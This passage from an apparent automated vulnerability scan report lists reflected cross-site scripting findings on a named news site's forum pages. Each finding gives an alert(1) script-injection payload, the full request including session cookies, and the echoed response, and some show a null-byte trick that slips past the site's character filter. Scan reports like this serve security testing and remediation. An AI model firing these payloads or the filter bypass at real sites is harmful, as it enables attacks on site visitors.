Path:   /forums/jrss/forum/602/5

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7fea7<script>alert(1)</script>441aed72aaa was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /forums/jrss/forum/602/5?callback=processJsonTopics7fea7<script>alert(1)</script>441aed72aaa&js_param1=forum_topics_container HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 01:22:40 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:23:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 2427
Content-Type: text/html; charset=utf-8

processJsonTopics7fea7<script>alert(1)</script>441aed72aaa( { 'xml' : '<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xml:base="http://forums.mercurynews.com" xmlns:dc="http://purl.org/dc/e
...[SNIP]...

3.72. http://forums.mercurynews.com/forums/jrss/forum/602/5 [js_param1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/jrss/forum/602/5

Issue detail

The value of the js_param1 request parameter is copied into the HTML document as plain text between tags. The payload 4134b<script>alert(1)</script>ea3b7054a28 was submitted in the js_param1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /forums/jrss/forum/602/5?callback=processJsonTopics&js_param1=forum_topics_container4134b<script>alert(1)</script>ea3b7054a28 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 01:25:41 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:26:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 2427
Content-Type: text/html; charset=utf-8

processJsonTopics( { 'xml' : '<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xml:base="http://forums.mercurynews.com" xmlns:dc="http://purl.org/dc/elements/1.1/"><channel> <title>MercuryNew
...[SNIP]...
</rss>' } , 'forum_topics_container4134b<script>alert(1)</script>ea3b7054a28' );

3.73. http://forums.mercurynews.com/forums/poll [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/poll

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7fc6"-alert(1)-"9628637350 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forumsd7fc6"-alert(1)-"9628637350/poll HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:12:05 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=d014b033f451192e0b481c31c0f9c21f; expires=Wed, 08 Dec 2010 02:45:25 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:12:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
nguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forumsd7fc6"-alert(1)-"9628637350/poll";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=ge
...[SNIP]...

3.74. http://forums.mercurynews.com/forums/poll [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/poll

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00cc000"-alert(1)-"9c127b33533 was submitted in the REST URL parameter 2. This input was echoed as cc000"-alert(1)-"9c127b33533 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/poll%00cc000"-alert(1)-"9c127b33533 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:12:30 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=ba286c7c4afb5835084961bfc4371e7b; expires=Wed, 08 Dec 2010 02:45:50 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:12:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/poll%00cc000"-alert(1)-"9c127b33533";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.75. http://forums.mercurynews.com/forums/syndication/jsonXmlToHtml.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/syndication/jsonXmlToHtml.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae6d"-alert(1)-"6579eb870fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forumsdae6d"-alert(1)-"6579eb870fb/syndication/jsonXmlToHtml.js HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:53:42 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:54:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
nguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forumsdae6d"-alert(1)-"6579eb870fb/syndication/jsonXmlToHtml.js";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.
...[SNIP]...

3.76. http://forums.mercurynews.com/forums/syndication/jsonXmlToHtml.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/syndication/jsonXmlToHtml.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0038e10"-alert(1)-"50952c2689f was submitted in the REST URL parameter 2. This input was echoed as 38e10"-alert(1)-"50952c2689f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/syndication%0038e10"-alert(1)-"50952c2689f/jsonXmlToHtml.js HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:54:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:54:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ipt">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/syndication%0038e10"-alert(1)-"50952c2689f/jsonXmlToHtml.js";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s
...[SNIP]...

3.77. http://forums.mercurynews.com/forums/syndication/jsonXmlToHtml.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/syndication/jsonXmlToHtml.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00db1dc"-alert(1)-"884372cd347 was submitted in the REST URL parameter 3. This input was echoed as db1dc"-alert(1)-"884372cd347 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/syndication/jsonXmlToHtml.js%00db1dc"-alert(1)-"884372cd347 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:54:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:54:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/syndication/jsonXmlToHtml.js%00db1dc"-alert(1)-"884372cd347";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.78. http://forums.mercurynews.com/jrss/forum/602/5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /jrss/forum/602/5

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea44e"-alert(1)-"b9cbcd4d1f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jrssea44e"-alert(1)-"b9cbcd4d1f1/forum/602/5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / jrssea44e"-alert(1)-"b9cbcd4d1f1/forum/602/5";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.camp
...[SNIP]...

3.79. http://forums.mercurynews.com/jrss/forum/602/5 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /jrss/forum/602/5

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 861fb"-alert(1)-"f033e721dd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jrss/forum861fb"-alert(1)-"f033e721dd3/602/5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ge="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / jrss/forum861fb"-alert(1)-"f033e721dd3/602/5";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=g
...[SNIP]...

3.80. http://forums.mercurynews.com/jrss/forum/602/5 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /jrss/forum/602/5

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abcc9"-alert(1)-"c5da668924b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jrss/forum/602abcc9"-alert(1)-"c5da668924b/5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:26 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / jrss/forum/602abcc9"-alert(1)-"c5da668924b/5";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.81. http://forums.mercurynews.com/poll [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /poll

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ddeb"-alert(1)-"d654b8caae1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll6ddeb"-alert(1)-"d654b8caae1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:05:52 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll6ddeb"-alert(1)-"d654b8caae1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.82. http://forums.mercurynews.com/poll [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /poll

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 617c4"-alert(1)-"5f42983c31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll?617c4"-alert(1)-"5f42983c31b=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:05:42 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
